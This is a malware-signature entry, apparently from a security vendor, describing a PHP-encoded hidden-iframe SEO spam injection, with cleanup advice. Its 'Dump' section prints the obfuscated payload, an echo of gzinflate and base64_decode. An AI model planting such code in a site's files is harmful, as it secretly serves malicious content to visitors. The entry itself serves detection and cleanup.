Malware Signatures

  1. Home
  2. Malware Signatures
  3. php.spam-seo.hiddeniframe.001

php.spam-seo.hiddeniframe.001

Blackhat SEO is a malicious technique used to manipulate the search engine results in order to benefit a website in terms of relevance. The payload is PHP based, thus intended for server-side use and the payload is executed directly on the server, while the site is loaded. Only the payload result (such as malicious iframe, or redirect) is visible in the browser, not the malicious code itself.
Hidden IFRAME is one of the most common malware type. This kind of injection is usually very small, thus hard to notice and any other malicious content can be loaded via such iframe. The malware creators are usually hiding it via css properties using techniques such as negative positioning, but very common way is injection of obfuscated JavaScript code which purpose is not very clear and is hard to decode. Such JavaScript code is responsible for hiding the iframes or other page elements.
In this case, another obfuscation layer is added to the payload: PHP encoding.

Affecting

Any vulnerable PHP based website. Outdated software or compromised passwords can act as an infection vector.

Cleanup

Inspect your files looking for the hidden iframes or any code that you do not recognize. Also, you can contact Sucuri to help you with the infection removal.

Dump


echo(gzinflate(base64_decode("3Y5BDsIgFET3TXoH8jfVTYkuXGjBS3gBBArfUGjob6u3l9pbOKvJJG9mGPsPdZPOOBKjz2gFkH0Tf6lF7SnIujJJz4ON1K4ZyR6aDvusBsumrAV4ovHKOaW8qGAmrUIgr6jF2CeOsdUO76cLsFgIAY8ViWwGVtpTCBidADVTAvarfKZsbBYQS6ACuihAl+EN8BadJwFnYCsa8puTHd+vyOZ4q6uO75/lFw==")));